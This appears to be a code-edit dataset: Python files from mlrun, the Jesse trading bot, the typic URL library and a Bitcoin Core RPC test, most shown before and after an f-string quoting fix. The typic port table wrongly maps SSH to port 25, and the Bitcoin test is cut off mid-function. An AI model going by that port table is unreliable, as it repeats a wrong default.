raise_for_status=RaiseForStatus.never,
).all()
all_records = [r["__name"] for r in all_records]
# Cleanup KV
for record in all_records:
v3io.kv.delete(
container=kv_container,
table_path=kv_path,
key=record,
raise_for_status=RaiseForStatus.never,
)
except RuntimeError:
pass
try:
# Cleanup TSDB
frames.delete(
backend="tsdb", table=tsdb_path, if_missing=fpb2.IGNORE,
)
except CreateError:
pass
@pytest.mark.skipif(
_is_env_params_dont_exist(), reason=_build_skip_message(),
)
def test_grafana_incoming_features(db: Session, client: TestClient):
path = config.model_endpoint_monitoring.store_prefixes.default.format(
project=TEST_PROJECT, kind=EVENTS
)
_, container, path = parse_model_endpoint_store_prefix(path)
frames = get_frames_client(
token=_get_access_key(), container=container, address=config.v3io_framesd,
)
frames.create(backend="tsdb", table=path, rate="10/m", if_exists=1)
start = datetime.utcnow()
endpoints = [_mock_random_endpoint() for _ in range(5)]
for e in endpoints:
e.spec.feature_names = ["f0", "f1", "f2", "f3"]
for endpoint in endpoints:
ModelEndpoints.create_or_patch(_get_access_key(), endpoint)
total = 0
dfs = []
for i in range(10):
count = randint(1, 10)
total += count
data = {
"f0": i,
"f1": i + 1,
"f2": i + 2,
"f3": i + 3,
"endpoint_id": endpoint.metadata.uid,
"timestamp": start - timedelta(minutes=10 - i),
}
df = pd.DataFrame(data=[data])
dfs.append(df)
frames.write(
backend="tsdb",
table=path,
dfs=dfs,
index_cols=["timestamp", "endpoint_id"],
)
for endpoint in endpoints:
response = client.post(
url="/api/grafana-proxy/model-endpoints/query",
headers={"X-V3io-Session-Key": _get_access_key()},
json={
"targets": [
{
"target": f"project={TEST_PROJECT};endpoint_id={endpoint.metadata.uid};target_endpoint=incoming_features" # noqa
}
]
},
)
response = response.json()
targets = [t["target"] for t in response]
assert targets == ["f0", "f1", "f2", "f3"]
lens = [t["datapoints"] for t in response]
assert all(map(lambda l: len(l) == 10, lens))
|
import threading
from typing import Union
import jesse.helpers as jh
from jesse.models import Order
from jesse.services import logger
class API:
def __init__(self) -> None:
self.drivers = {}
if not jh.is_live():
self.initiate_drivers()
def initiate_drivers(self) -> None:
for e in jh.get_config('app.considering_exchanges'):
if jh.is_live():
def initiate_ws(exchange_name: str) -> None:
from jesse_live.info import SUPPORTED_EXCHANGES, SUPPORTED_EXCHANGES_NAMES
exchange_class = jh.get_config(f'app.live_drivers.{exchange_name}')
if exchange_name not in SUPPORTED_EXCHANGES_NAMES:
exchange_names = ''
for se in SUPPORTED_EXCHANGES:
exchange_names += f'\n "{se['name']}"'
error_msg = f'Driver for "{exchange_name}" is not supported yet. Supported exchanges are: {exchange_names}'
jh.error(error_msg, force_print=True)
jh.terminate_app()
self.drivers[exchange_name] = exchange_class()
threading.Thread(target=initiate_ws, args=[e]).start()
else:
from jesse.exchanges import Sandbox
self.drivers[e] = Sandbox(e)
def market_order(
self,
exchange: str,
symbol: str,
qty: float,
current_price: float,
side: str,
role: str,
flags: list
) -> Union[Order, None]:
if exchange not in self.drivers:
logger.info(f'Exchange "{exchange}" driver not initiated yet. Trying again in the next candle')
return None
return self.drivers[exchange].market_order(symbol, qty, current_price, side, role, flags)
def limit_order(
self,
exchange: str,
symbol: str,
qty: float,
price: float,
side: str,
role: str,
flags: list
) -> Union[Order, None]:
if exchange not in self.drivers:
logger.info(f'Exchange "{exchange}" driver not initiated yet. Trying again in the next candle')
return None
return self.drivers[exchange].limit_order(symbol, qty, price, side, role, flags)
def stop_order(
self, exchange: str,
symbol: str,
qty: float,
price: float,
side: str,
role: str,
flags: list
) -> Union[Order, None]:
if exchange not in self.drivers:
logger.info(f'Exchange "{exchange}" driver not initiated yet. Trying again in the next candle')
return None
return self.drivers[exchange].stop_order(symbol, qty, price, side, role, flags)
def cancel_all_orders(self, exchange: str, symbol: str) -> bool:
if exchange not in self.drivers:
logger.info(f'Exchange "{exchange}" driver not initiated yet. Trying again in the next candle')
return False
return self.drivers[exchange].cancel_all_orders(symbol)
def cancel_order(self, exchange: str, symbol: str, order_id: str) -> bool:
if exchange not in self.drivers:
logger.info(f'Exchange "{exchange}" driver not initiated yet. Trying again in the next candle')
return False
return self.drivers[exchange].cancel_order(symbol, order_id)
api = API()
| import threading
from typing import Union
import jesse.helpers as jh
from jesse.models import Order
from jesse.services import logger
class API:
def __init__(self) -> None:
self.drivers = {}
if not jh.is_live():
self.initiate_drivers()
def initiate_drivers(self) -> None:
for e in jh.get_config('app.considering_exchanges'):
if jh.is_live():
def initiate_ws(exchange_name: str) -> None:
from jesse_live.info import SUPPORTED_EXCHANGES, SUPPORTED_EXCHANGES_NAMES
exchange_class = jh.get_config(f'app.live_drivers.{exchange_name}')
if exchange_name not in SUPPORTED_EXCHANGES_NAMES:
exchange_names = ''
for se in SUPPORTED_EXCHANGES:
exchange_names += f'\n "{se["name"]}"'
error_msg = f'Driver for "{exchange_name}" is not supported yet. Supported exchanges are: {exchange_names}'
jh.error(error_msg, force_print=True)
jh.terminate_app()
self.drivers[exchange_name] = exchange_class()
threading.Thread(target=initiate_ws, args=[e]).start()
else:
from jesse.exchanges import Sandbox
self.drivers[e] = Sandbox(e)
def market_order(
self,
exchange: str,
symbol: str,
qty: float,
current_price: float,
side: str,
role: str,
flags: list
) -> Union[Order, None]:
if exchange not in self.drivers:
logger.info(f'Exchange "{exchange}" driver not initiated yet. Trying again in the next candle')
return None
return self.drivers[exchange].market_order(symbol, qty, current_price, side, role, flags)
def limit_order(
self,
exchange: str,
symbol: str,
qty: float,
price: float,
side: str,
role: str,
flags: list
) -> Union[Order, None]:
if exchange not in self.drivers:
logger.info(f'Exchange "{exchange}" driver not initiated yet. Trying again in the next candle')
return None
return self.drivers[exchange].limit_order(symbol, qty, price, side, role, flags)
def stop_order(
self, exchange: str,
symbol: str,
qty: float,
price: float,
side: str,
role: str,
flags: list
) -> Union[Order, None]:
if exchange not in self.drivers:
logger.info(f'Exchange "{exchange}" driver not initiated yet. Trying again in the next candle')
return None
return self.drivers[exchange].stop_order(symbol, qty, price, side, role, flags)
def cancel_all_orders(self, exchange: str, symbol: str) -> bool:
if exchange not in self.drivers:
logger.info(f'Exchange "{exchange}" driver not initiated yet. Trying again in the next candle')
return False
return self.drivers[exchange].cancel_all_orders(symbol)
def cancel_order(self, exchange: str, symbol: str, order_id: str) -> bool:
if exchange not in self.drivers:
logger.info(f'Exchange "{exchange}" driver not initiated yet. Trying again in the next candle')
return False
return self.drivers[exchange].cancel_order(symbol, order_id)
api = API()
|
from __future__ import annotations
import dataclasses
import re
from collections import defaultdict
from types import MappingProxyType
from typing import Dict, List, ClassVar, Pattern, Match, Mapping, Set, Optional
from urllib import parse
from typic.util import cached_property, slotted
from .secret import SecretStr
__all__ = (
"NetAddrInfo",
"NetworkAddress",
"NetworkAddressValueError",
"AbsoluteURL",
"AbsoluteURLValueError",
"HostName",
"HostNameValueError",
"RelativeURL",
"RelativeURLValueError",
"URL",
)
# By no means an exhaustive list, but a decent chunk of use-cases
DEFAULT_PORTS = defaultdict(
set,
{
"http": {80},
"https": {443},
"ws": {80},
"wss": {443},
"smtp": {25},
"ftp": {20, 21},
"telnet": {23},
"imap": {143},
"rdp": {3389},
"ssh": {25},
"dns": {53},
"dhcp": {67, 68},
"pop3": {110},
"mysql": {3306},
"vertica": {5434},
"postgresql": {5432},
},
)
NET_ADDR_PATTERN = re.compile(
r"""
^
(
# Scheme
((?P<scheme>(?:[a-z0-9\.\-\+]*))://)?
# Auth
(?P<auth>(?:(?P<username>[^:@]+?)[:@](?P<password>[^:@]*?)[:@]))?
# Host
(?P<host>(?:
# Domain
(?P<domain>
(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+
(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)
)
# Localhost
|(?P<localhost>localhost)
|(?P<dotless>(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.?))
# IPV4
|(?P<ipv4>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})
# IPV6
|(?P<ipv6>\[[A-F0-9]*:[A-F0-9:]+\])
))?
# Port
(:(?P<port>(?:\d+)))?
)?
# Path, Q-string & fragment
(?P<relative>(?:/?|[/?#]\S+))
$
""",
re.IGNORECASE | re.VERBOSE,
)
PRIVATE_HOSTS = {"localhost", "127.0.0.1"}
INTERNAL_HOSTS = PRIVATE_HOSTS | {"0.0.0.0"}
INTERNAL_IP_PATTERN = re.compile(
r"""
^
# IPv4
(127\.)|
(192\.168\.)|
(10\.)|(172\.1[6-9]\.)|
(172\.2[0-9]\.)|(172\.3[0-1]\.)|
# IPv6
(::1)|([F][CD])
$
""",
re.I | re.VERBOSE,
)
class NetworkAddressValueError(ValueError):
"""A generic error indicating the value is not a valid network address."""
@slotted(dict=True)
@dataclasses.dataclass(frozen=True)
class NetAddrInfo:
"""Detailed information about a network address.
Can be called directly, generated by casting a :py:class:`str` as
:py:class:`NetworkAddress`, or created with :py:meth:`NetAddrInfo.from_str`
"""
scheme: str
"""The net-address scheme, e.g., `http`, `tcp`, `ssh`, etc."""
auth: str
"""The user auth info."""
password: SecretStr
"""The user's password."""
host: str
"""The host for this addres, e.g. `0.0.0.0`, `foobar.net`."""
port: int
"""The port for this net-address"""
path: str
"""The URI path."""
qs: str
"""The query-string, unparsed, e.g. `?id=1&name=foo`"""
params: str
"""The url parameters, unparsed, e.g. `id=2;foo=bar`"""
fragment: str
"""The uri fragment, e.g. `#some-page-anchor`"""
is_ip: bool = False
PATTERN: ClassVar[Pattern] = NET_ADDR_PATTERN
DEFAULT_PORTS: ClassVar[Dict] = DEFAULT_PORTS
PRIVATE_HOSTS: ClassVar[Set[str]] = PRIVATE_HOSTS
INTERNAL_HOSTS: ClassVar[Set[str]] = INTERNAL_HOSTS
@classmethod
def from_str(cls, value) -> "NetAddrInfo":
"""Parse a string, validate, and return an instance of :py:class:`NetAddrInfo`."""
match: Optional[Match] = cls.PATTERN.match(value)
if not match or not value:
raise NetworkAddressValueError(f"{value!r} is not a valid network address.")
scheme, host = match["scheme"] or "", match["host"] or ""
if scheme and not host:
raise NetworkAddressValueError(f"{value!r} is not a valid network address.")
# why re-invent the wheel here? this is fast and correct.
parsed: parse.ParseResult = parse.urlparse(match["relative"] or "")
# get/set the port
port = int(match["port"] or 0)
if port == 0 and cls.DEFAULT_PORTS[scheme]:
port = cls.DEFAULT_PORTS[scheme].copy().pop()
return cls(
scheme=scheme,
auth=match["auth"] or "",
password=SecretStr(match["password"] or ""),
host=host,
port=port,
path=parsed.path,
qs=parsed.query,
params=parsed.params,
fragment=parsed.fragment,
is_ip=bool(match["ipv4"] or match["ipv6"]),
)
@cached_property
def base(self) -> str:
"""The 'base' of the URL, including scheme, auth, and host."""
base = f"{self.scheme}://" if self.scheme else ""
port = f":{self.port}" if self.port and not self.is_default_port else ""
return f"{base}{self.auth}{self.host}{port}"
@cached_property
def relative(self):
"""The 'relative' portion of the URL: path, params, query, and fragment."""
params = f";{self.params}" if self.params else ""
qs = f"?{self.qs}" if self.qs else ""
fragment = f"#{self.fragment}" if self.fragment else ""
return f"{self.path}{params}{qs}{fragment}"
@cached_property
def address(self) -> str:
"""The fully-qualified network address.
If this instance was generated from a string, it will match."""
return f"{self.base}{self.relative}"
@cached_property
def address_encoded(self) -> str:
"""The fully-qualified network address, encoded."""
return parse.quote(self.address) # type: ignore
@cached_property
def query(self) -> Mapping[str, List[str]]:
"""The query-string, parsed into a mapping of key -> [values, ...]."""
return MappingProxyType(parse.parse_qs(self.qs) if self.qs else {})
@cached_property
def parameters(self) -> Mapping[str, List[str]]:
"""The params, parsed into a mapping of key -> [values, ...]."""
return MappingProxyType(parse.parse_qs(self.params) if self.params else {})
@cached_property
def is_default_port(self) -> bool:
"""Whether address is using the default port assigned to the given scheme."""
defaults = DEFAULT_PORTS[self.scheme] | {0}
return self.port in defaults
@cached_property
def is_relative(self) -> bool:
"""Whether address is 'relative' (i.e., whether a scheme is provided)."""
return not self.scheme
@cached_property
def is_absolute(self) -> bool:
"""The opposite of `is_relative`."""
return not self.is_relative
@cached_property
def is_private(self) -> bool:
"""Whether or not the URL is using a 'private' host, i.e., 'localhost'."""
return self.host in PRIVATE_HOSTS
@cached_property
def is_internal(self) -> bool:
"""Whether the host provided is an 'internal' host.
This may or may not be private, hence the distinction."""
return bool(
self.host
and self.host in INTERNAL_HOSTS
or (self.is_ip and INTERNAL_IP_PATTERN.match(self.host))
)
# Deepcopy is broken for frozen dataclasses with slots.
# https://github.com/python/cpython/pull/17254
# NetAddrInfo.__slots__ = tuple(
# _.name for _ in dataclasses.fields(NetAddrInfo)
# )
class NetworkAddress(str):
"""A generic, immutable network address string.
Detailed information about the network address string can be looked up via
:py:attr:`NetworkAddress.info`.
This object is the base object for network-related objects.
:py:class:`URL` has a much richer interface.
Examples
--------
>>> import typic
>>> net_addr = typic.NetworkAddress("http://foo.bar/bazz;foo=bar?buzz=1#loc")
>>> net_addr.info.is_absolute
True
>>> net_addr.info.host
'foo.bar'
>>> net_addr.info.scheme
'http'
>>> net_addr.info.address_encoded
'http%3A//foo.bar/bazz%3Bfoo%3Dbar%3Fbuzz%3D1%23loc'
>>> net_addr.info.query
mappingproxy({'buzz': ['1']})
>>> net_addr.info.parameters
mappingproxy({'foo': ['bar']})
>>> net_addr.info.fragment
'loc'
>>> domain = typic.URL("foo.bar")
>>> domain.info.is_relative
True
>>> domain.info.host
'foo.bar'
>>> net_addr
'http://foo.bar/bazz;foo=bar?buzz=1#loc'
>>> import json
>>> json.dumps([net_addr])
'["http://foo.bar/bazz;foo=bar?buzz=1#loc"]'
See Also
--------
:py:class:`NetAddrInfo`
:py:class:`URL`
Notes
-----
This object inherits directly from :py:class:`str` and so is natively
JSON-serializable.
"""
def __new__(cls, *args, **kwargs):
v = super().__new__(cls, *args, **kwargs)
# Initialize the info so we get validation immediately.
v.info
return v
def __setattr__(self, key, value):
raise AttributeError(
f"attempting to set attribute on immutable type {type(self)}"
)
def __delattr__(self, key):
raise AttributeError(
f"attempting to delete attribute on immutable type {type(self)}"
)
@cached_property
def info(self) -> NetAddrInfo:
return NetAddrInfo.from_str(self)
class URLValueError(NetworkAddressValueError):
"""Generic error for an invalid value passed to URL."""
pass
class URL(NetworkAddress):
"""A string which parses the value provided as if it were a URL.
Detailed information about the url string can be looked up via :py:attr:`URL.info`.
Examples
--------
>>> import typic
>>> url = typic.URL("http://foo.bar/bazz")
>>> more = url / 'foo' / 'bar'
>>> more
'http://foo.bar/bazz/foo/bar'
>>> typic.URL(url.info.base) / 'other'
'http://foo.bar/other'
See Also
--------
:py:class:`NetworkAddress`
:py:class:`NetAddrInfo`
Notes
-----
This object inherits directly from :py:class:`NetworkAddress` and so is natively
JSON-serializable.
"""
def join(self, other) -> "URL":
"""Join another URL with this one.
This works roughly like :py:meth:`pathlib.Path.joinpath`.
Unlike :py:func:`urllib.parse.urljoin`, this method allows the user to build
onto existing paths.
"""
cls = type(self)
# best guess at the path
other_info: NetAddrInfo = cls(other).info # type: ignore
self_info: NetAddrInfo = self.info # type: ignore
other = (other_info.path or parse.urlparse(other).path or "").lstrip("/")
other = f"{self_info.path.rstrip("/") or ""}/{other}"
return cls(parse.urljoin(self_info.base, other)) # type: ignore
def __truediv__(self, other) -> "URL":
"""Overloading some operators to make it easier. Uses `:py:meth:`URL.join`."""
return self.join(other)
def __rtruediv__(self, other) -> "URL":
return URL(other) / self
class AbsoluteURLValueError(URLValueError):
pass
class AbsoluteURL(URL):
"""An absolute URL.
See Also
--------
:py:class:`URL`
"""
def __new__(cls, *args, **kwargs):
v = super().__new__(cls, *args, **kwargs)
if v.info.is_relative:
raise AbsoluteURLValueError(f"<{v!r}> is not an absolute URL.") from None
return v
class RelativeURLValueError(URLValueError):
pass
class RelativeURL(URL):
"""A relative URL.
See Also
--------
:py:class:`URL`
"""
def __new__(cls, *args, **kwargs):
v = super().__new__(cls, *args, **kwargs)
if v.info.is_absolute:
raise RelativeURLValueError(f"<{v!r}> is not a relative URL.") from None
return v
class HostNameValueError(NetworkAddressValueError):
pass
class HostName(NetworkAddress):
"""A network address referencing only a host-name (e.g. foo.bar.com).
See Also
--------
:py:class:`NetworkAddress`
:py:class:`NetAddrInfo`
Notes
-----
This object inherits directly from :py:class:`NetworkAddress` and, so is natively
JSON-serializable.
"""
def __new__(cls, *args, **kwargs):
v = super().__new__(cls, *args, **kwargs)
if not v.info.host or any((v.info.scheme, v.info.auth, v.info.relative)):
raise HostNameValueError(f"<{v!r}> is not a hostname.") from None
return v
| from __future__ import annotations
import dataclasses
import re
from collections import defaultdict
from types import MappingProxyType
from typing import Dict, List, ClassVar, Pattern, Match, Mapping, Set, Optional
from urllib import parse
from typic.util import cached_property, slotted
from .secret import SecretStr
__all__ = (
"NetAddrInfo",
"NetworkAddress",
"NetworkAddressValueError",
"AbsoluteURL",
"AbsoluteURLValueError",
"HostName",
"HostNameValueError",
"RelativeURL",
"RelativeURLValueError",
"URL",
)
# By no means an exhaustive list, but a decent chunk of use-cases
DEFAULT_PORTS = defaultdict(
set,
{
"http": {80},
"https": {443},
"ws": {80},
"wss": {443},
"smtp": {25},
"ftp": {20, 21},
"telnet": {23},
"imap": {143},
"rdp": {3389},
"ssh": {25},
"dns": {53},
"dhcp": {67, 68},
"pop3": {110},
"mysql": {3306},
"vertica": {5434},
"postgresql": {5432},
},
)
NET_ADDR_PATTERN = re.compile(
r"""
^
(
# Scheme
((?P<scheme>(?:[a-z0-9\.\-\+]*))://)?
# Auth
(?P<auth>(?:(?P<username>[^:@]+?)[:@](?P<password>[^:@]*?)[:@]))?
# Host
(?P<host>(?:
# Domain
(?P<domain>
(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+
(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)
)
# Localhost
|(?P<localhost>localhost)
|(?P<dotless>(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.?))
# IPV4
|(?P<ipv4>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})
# IPV6
|(?P<ipv6>\[[A-F0-9]*:[A-F0-9:]+\])
))?
# Port
(:(?P<port>(?:\d+)))?
)?
# Path, Q-string & fragment
(?P<relative>(?:/?|[/?#]\S+))
$
""",
re.IGNORECASE | re.VERBOSE,
)
PRIVATE_HOSTS = {"localhost", "127.0.0.1"}
INTERNAL_HOSTS = PRIVATE_HOSTS | {"0.0.0.0"}
INTERNAL_IP_PATTERN = re.compile(
r"""
^
# IPv4
(127\.)|
(192\.168\.)|
(10\.)|(172\.1[6-9]\.)|
(172\.2[0-9]\.)|(172\.3[0-1]\.)|
# IPv6
(::1)|([F][CD])
$
""",
re.I | re.VERBOSE,
)
class NetworkAddressValueError(ValueError):
"""A generic error indicating the value is not a valid network address."""
@slotted(dict=True)
@dataclasses.dataclass(frozen=True)
class NetAddrInfo:
"""Detailed information about a network address.
Can be called directly, generated by casting a :py:class:`str` as
:py:class:`NetworkAddress`, or created with :py:meth:`NetAddrInfo.from_str`
"""
scheme: str
"""The net-address scheme, e.g., `http`, `tcp`, `ssh`, etc."""
auth: str
"""The user auth info."""
password: SecretStr
"""The user's password."""
host: str
"""The host for this addres, e.g. `0.0.0.0`, `foobar.net`."""
port: int
"""The port for this net-address"""
path: str
"""The URI path."""
qs: str
"""The query-string, unparsed, e.g. `?id=1&name=foo`"""
params: str
"""The url parameters, unparsed, e.g. `id=2;foo=bar`"""
fragment: str
"""The uri fragment, e.g. `#some-page-anchor`"""
is_ip: bool = False
PATTERN: ClassVar[Pattern] = NET_ADDR_PATTERN
DEFAULT_PORTS: ClassVar[Dict] = DEFAULT_PORTS
PRIVATE_HOSTS: ClassVar[Set[str]] = PRIVATE_HOSTS
INTERNAL_HOSTS: ClassVar[Set[str]] = INTERNAL_HOSTS
@classmethod
def from_str(cls, value) -> "NetAddrInfo":
"""Parse a string, validate, and return an instance of :py:class:`NetAddrInfo`."""
match: Optional[Match] = cls.PATTERN.match(value)
if not match or not value:
raise NetworkAddressValueError(f"{value!r} is not a valid network address.")
scheme, host = match["scheme"] or "", match["host"] or ""
if scheme and not host:
raise NetworkAddressValueError(f"{value!r} is not a valid network address.")
# why re-invent the wheel here? this is fast and correct.
parsed: parse.ParseResult = parse.urlparse(match["relative"] or "")
# get/set the port
port = int(match["port"] or 0)
if port == 0 and cls.DEFAULT_PORTS[scheme]:
port = cls.DEFAULT_PORTS[scheme].copy().pop()
return cls(
scheme=scheme,
auth=match["auth"] or "",
password=SecretStr(match["password"] or ""),
host=host,
port=port,
path=parsed.path,
qs=parsed.query,
params=parsed.params,
fragment=parsed.fragment,
is_ip=bool(match["ipv4"] or match["ipv6"]),
)
@cached_property
def base(self) -> str:
"""The 'base' of the URL, including scheme, auth, and host."""
base = f"{self.scheme}://" if self.scheme else ""
port = f":{self.port}" if self.port and not self.is_default_port else ""
return f"{base}{self.auth}{self.host}{port}"
@cached_property
def relative(self):
"""The 'relative' portion of the URL: path, params, query, and fragment."""
params = f";{self.params}" if self.params else ""
qs = f"?{self.qs}" if self.qs else ""
fragment = f"#{self.fragment}" if self.fragment else ""
return f"{self.path}{params}{qs}{fragment}"
@cached_property
def address(self) -> str:
"""The fully-qualified network address.
If this instance was generated from a string, it will match."""
return f"{self.base}{self.relative}"
@cached_property
def address_encoded(self) -> str:
"""The fully-qualified network address, encoded."""
return parse.quote(self.address) # type: ignore
@cached_property
def query(self) -> Mapping[str, List[str]]:
"""The query-string, parsed into a mapping of key -> [values, ...]."""
return MappingProxyType(parse.parse_qs(self.qs) if self.qs else {})
@cached_property
def parameters(self) -> Mapping[str, List[str]]:
"""The params, parsed into a mapping of key -> [values, ...]."""
return MappingProxyType(parse.parse_qs(self.params) if self.params else {})
@cached_property
def is_default_port(self) -> bool:
"""Whether address is using the default port assigned to the given scheme."""
defaults = DEFAULT_PORTS[self.scheme] | {0}
return self.port in defaults
@cached_property
def is_relative(self) -> bool:
"""Whether address is 'relative' (i.e., whether a scheme is provided)."""
return not self.scheme
@cached_property
def is_absolute(self) -> bool:
"""The opposite of `is_relative`."""
return not self.is_relative
@cached_property
def is_private(self) -> bool:
"""Whether or not the URL is using a 'private' host, i.e., 'localhost'."""
return self.host in PRIVATE_HOSTS
@cached_property
def is_internal(self) -> bool:
"""Whether the host provided is an 'internal' host.
This may or may not be private, hence the distinction."""
return bool(
self.host
and self.host in INTERNAL_HOSTS
or (self.is_ip and INTERNAL_IP_PATTERN.match(self.host))
)
# Deepcopy is broken for frozen dataclasses with slots.
# https://github.com/python/cpython/pull/17254
# NetAddrInfo.__slots__ = tuple(
# _.name for _ in dataclasses.fields(NetAddrInfo)
# )
class NetworkAddress(str):
"""A generic, immutable network address string.
Detailed information about the network address string can be looked up via
:py:attr:`NetworkAddress.info`.
This object is the base object for network-related objects.
:py:class:`URL` has a much richer interface.
Examples
--------
>>> import typic
>>> net_addr = typic.NetworkAddress("http://foo.bar/bazz;foo=bar?buzz=1#loc")
>>> net_addr.info.is_absolute
True
>>> net_addr.info.host
'foo.bar'
>>> net_addr.info.scheme
'http'
>>> net_addr.info.address_encoded
'http%3A//foo.bar/bazz%3Bfoo%3Dbar%3Fbuzz%3D1%23loc'
>>> net_addr.info.query
mappingproxy({'buzz': ['1']})
>>> net_addr.info.parameters
mappingproxy({'foo': ['bar']})
>>> net_addr.info.fragment
'loc'
>>> domain = typic.URL("foo.bar")
>>> domain.info.is_relative
True
>>> domain.info.host
'foo.bar'
>>> net_addr
'http://foo.bar/bazz;foo=bar?buzz=1#loc'
>>> import json
>>> json.dumps([net_addr])
'["http://foo.bar/bazz;foo=bar?buzz=1#loc"]'
See Also
--------
:py:class:`NetAddrInfo`
:py:class:`URL`
Notes
-----
This object inherits directly from :py:class:`str` and so is natively
JSON-serializable.
"""
def __new__(cls, *args, **kwargs):
v = super().__new__(cls, *args, **kwargs)
# Initialize the info so we get validation immediately.
v.info
return v
def __setattr__(self, key, value):
raise AttributeError(
f"attempting to set attribute on immutable type {type(self)}"
)
def __delattr__(self, key):
raise AttributeError(
f"attempting to delete attribute on immutable type {type(self)}"
)
@cached_property
def info(self) -> NetAddrInfo:
return NetAddrInfo.from_str(self)
class URLValueError(NetworkAddressValueError):
"""Generic error for an invalid value passed to URL."""
pass
class URL(NetworkAddress):
"""A string which parses the value provided as if it were a URL.
Detailed information about the url string can be looked up via :py:attr:`URL.info`.
Examples
--------
>>> import typic
>>> url = typic.URL("http://foo.bar/bazz")
>>> more = url / 'foo' / 'bar'
>>> more
'http://foo.bar/bazz/foo/bar'
>>> typic.URL(url.info.base) / 'other'
'http://foo.bar/other'
See Also
--------
:py:class:`NetworkAddress`
:py:class:`NetAddrInfo`
Notes
-----
This object inherits directly from :py:class:`NetworkAddress` and so is natively
JSON-serializable.
"""
def join(self, other) -> "URL":
"""Join another URL with this one.
This works roughly like :py:meth:`pathlib.Path.joinpath`.
Unlike :py:func:`urllib.parse.urljoin`, this method allows the user to build
onto existing paths.
"""
cls = type(self)
# best guess at the path
other_info: NetAddrInfo = cls(other).info # type: ignore
self_info: NetAddrInfo = self.info # type: ignore
other = (other_info.path or parse.urlparse(other).path or "").lstrip("/")
other = f"{self_info.path.rstrip('/') or ''}/{other}"
return cls(parse.urljoin(self_info.base, other)) # type: ignore
def __truediv__(self, other) -> "URL":
"""Overloading some operators to make it easier. Uses `:py:meth:`URL.join`."""
return self.join(other)
def __rtruediv__(self, other) -> "URL":
return URL(other) / self
class AbsoluteURLValueError(URLValueError):
pass
class AbsoluteURL(URL):
"""An absolute URL.
See Also
--------
:py:class:`URL`
"""
def __new__(cls, *args, **kwargs):
v = super().__new__(cls, *args, **kwargs)
if v.info.is_relative:
raise AbsoluteURLValueError(f"<{v!r}> is not an absolute URL.") from None
return v
class RelativeURLValueError(URLValueError):
pass
class RelativeURL(URL):
"""A relative URL.
See Also
--------
:py:class:`URL`
"""
def __new__(cls, *args, **kwargs):
v = super().__new__(cls, *args, **kwargs)
if v.info.is_absolute:
raise RelativeURLValueError(f"<{v!r}> is not a relative URL.") from None
return v
class HostNameValueError(NetworkAddressValueError):
pass
class HostName(NetworkAddress):
"""A network address referencing only a host-name (e.g. foo.bar.com).
See Also
--------
:py:class:`NetworkAddress`
:py:class:`NetAddrInfo`
Notes
-----
This object inherits directly from :py:class:`NetworkAddress` and, so is natively
JSON-serializable.
"""
def __new__(cls, *args, **kwargs):
v = super().__new__(cls, *args, **kwargs)
if not v.info.host or any((v.info.scheme, v.info.auth, v.info.relative)):
raise HostNameValueError(f"<{v!r}> is not a hostname.") from None
return v
|
#!/usr/bin/env python3
# Copyright (c) 2014-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the rawtransaction RPCs.
Test the following RPCs:
- getrawtransaction
- createrawtransaction
- signrawtransactionwithwallet
- sendrawtransaction
- decoderawtransaction
"""
from collections import OrderedDict
from decimal import Decimal
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.messages import (
CTransaction,
tx_from_hex,
)
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
find_vout_for_address,
)
TXID = "1d1d4e24ed99057e84c3f80fd8fbec79ed9e1acee37da269356ecea000000000"
class multidict(dict):
"""Dictionary that allows duplicate keys.
Constructed with a list of (key, value) tuples. When dumped by the json module,
will output invalid json with repeated keys, eg:
>>> json.dumps(multidict([(1,2),(1,2)])
'{"1": 2, "1": 2}'
Used to test calls to rpc methods with repeated keys in the json object."""
def __init__(self, x):
dict.__init__(self, x)
self.x = x
def items(self):
return self.x
class RawTransactionsTest(BitcoinTestFramework):
def set_test_params(self):
    """Configure a fresh 4-node chain; nodes 0-2 run with -txindex."""
    self.setup_clean_chain = True
    self.num_nodes = 4
    per_node_args = [
        ["-txindex"],
        ["-txindex"],
        ["-txindex"],
        [],
    ]
    # whitelist all peers to speed up tx relay / mempool sync
    whitelist = "-whitelist=noban@127.0.0.1"
    self.extra_args = [node_args + [whitelist] for node_args in per_node_args]
    self.supports_cli = False
def skip_test_if_missing_module(self):
    """Skip the whole test when the build has no wallet support."""
    self.skip_if_no_wallet()
def setup_network(self):
    """Build the default topology, then additionally connect node0 to node2."""
    super().setup_network()
    self.connect_nodes(0, 2)
def run_test(self):
    """Fund the nodes, then run each *rawtransaction RPC test group in order."""
    self.log.info("Prepare some coins for multiple *rawtransaction commands")
    self.generate(self.nodes[2], 1)
    self.sync_all()
    # Mature node0's coinbase so it has spendable funds.
    self.generate(self.nodes[0], COINBASE_MATURITY + 1)
    self.sync_all()
    for amount in [1.5, 1.0, 5.0]:
        self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), amount)
    self.sync_all()
    self.generate(self.nodes[0], 5)
    self.sync_all()
    self.getrawtransaction_tests()
    self.createrawtransaction_tests()
    self.signrawtransactionwithwallet_tests()
    self.sendrawtransaction_tests()
    self.sendrawtransaction_testmempoolaccept_tests()
    self.decoderawtransaction_tests()
    self.transaction_version_number_tests()
    # The traditional multisig flow is incompatible with descriptor wallets.
    if not self.options.descriptors:
        self.raw_multisig_transaction_legacy_tests()
def getrawtransaction_tests(self):
    """Exercise getrawtransaction: verbosity arguments, blockhash-based
    lookups with and without -txindex, and the genesis-coinbase error.

    Fix: the two log lines below used double quotes inside a double-quoted
    f-string expression, which is a SyntaxError before Python 3.12 (PEP 701).
    They now use single quotes, matching the style used elsewhere.
    """
    addr = self.nodes[1].getnewaddress()
    txid = self.nodes[0].sendtoaddress(addr, 10)
    self.generate(self.nodes[0], 1)
    self.sync_all()
    vout = find_vout_for_address(self.nodes[1], txid, addr)
